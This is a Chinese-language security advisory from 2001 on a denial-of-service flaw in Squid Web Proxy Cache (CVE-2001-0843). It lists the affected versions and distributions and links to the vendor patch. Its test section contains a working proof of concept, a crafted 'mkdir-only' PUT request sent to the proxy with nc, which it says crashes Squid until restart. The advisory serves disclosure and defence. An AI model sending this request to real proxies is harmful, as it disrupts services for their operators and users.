安全研究
安全漏洞
Squid Web Proxy Cache 拒绝服务漏洞
发布日期:2001-09-21
更新日期:2001-09-24
受影响系统:
描述:
National Science Foundation Squid Web Proxy 2.3STABLE5
National Science Foundation Squid Web Proxy 2.3STABLE4
- Caldera OpenLinux Server 3.1
- Immunix Immunix OS 6.2
- Immunix Immunix OS 7.0
- Immunix Immunix OS 7.0beta
- MandrakeSoft Corporate Server 1.0.1
- MandrakeSoft Linux Mandrake 7.1
- MandrakeSoft Linux Mandrake 7.2
- MandrakeSoft Linux Mandrake 8.0
- MandrakeSoft Single Network Firewall 7.2
- RedHat Linux 7.0
- Trustix Secure Linux 1.01
- Trustix Secure Linux 1.1
- Trustix Secure Linux 1.2
National Science Foundation Squid Web Proxy 2.3STABLE3
- MandrakeSoft Corporate Server 1.0.1
- MandrakeSoft Linux Mandrake 7.1
- MandrakeSoft Linux Mandrake 7.2
- MandrakeSoft Linux Mandrake 8.0
- MandrakeSoft Single Network Firewall 7.2
- RedHat Linux 7.0
- Trustix Secure Linux 1.01
- Trustix Secure Linux 1.1
- Trustix Secure Linux 1.2
National Science Foundation Squid Web Proxy 2.3STABLE2
- MandrakeSoft Corporate Server 1.0.1
- MandrakeSoft Linux Mandrake 7.1
- MandrakeSoft Linux Mandrake 7.2
- MandrakeSoft Linux Mandrake 8.0
- MandrakeSoft Single Network Firewall 7.2
- Trustix Secure Linux 1.01
- Trustix Secure Linux 1.1
- Trustix Secure Linux 1.2
National Science Foundation Squid Web Proxy 2.3
National Science Foundation Squid Web Proxy 2.4STABLE1
National Science Foundation Squid Web Proxy 2.4PRE-STABLE2
National Science Foundation Squid Web Proxy 2.4PRE-STABLE
National Science Foundation Squid Web Proxy 2.4DEVEL4
National Science Foundation Squid Web Proxy 2.4DEVEL2
National Science Foundation Squid Web Proxy 2.4
BUGTRAQ ID: 3354
CVE(CAN) ID: CVE-2001-0843
Squid Web Proxy Cache是一款免费,开放源代码的代理服务器。
发现Squid处理在代理服务器上创建目录的请求时存在问题,一个特殊构造的通过Squid
代理服务器发向远程FTP服务器的“mkdir-only”PUT请求就可能导致Squid拒绝服务。
<*来源:Vladimir Ivaschenko (hazard@francoudi.com)
参考:http://archives.neohapsis.com/archives/bugtraq/2001-09/0181.html
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
例如:
nc proxy:3128
PUT ftp://ftpserver/WEB-INF/1/2/1/ HTTP/1.1
Content-type: application/octet-stream
Content-length: 0
Pragma: no-cache
将导致拒绝服务攻击,只有重新启动Squid才能恢复正常功能。
建议:
厂商补丁:
目前厂商已经发布了升级补丁,请到厂商主页下载:
http://www.squid-cache.org/bugs/showattachment.cgi?attach_id=38
浏览次数:5509
严重程度:0(网友投票)
绿盟科技给您安全的保障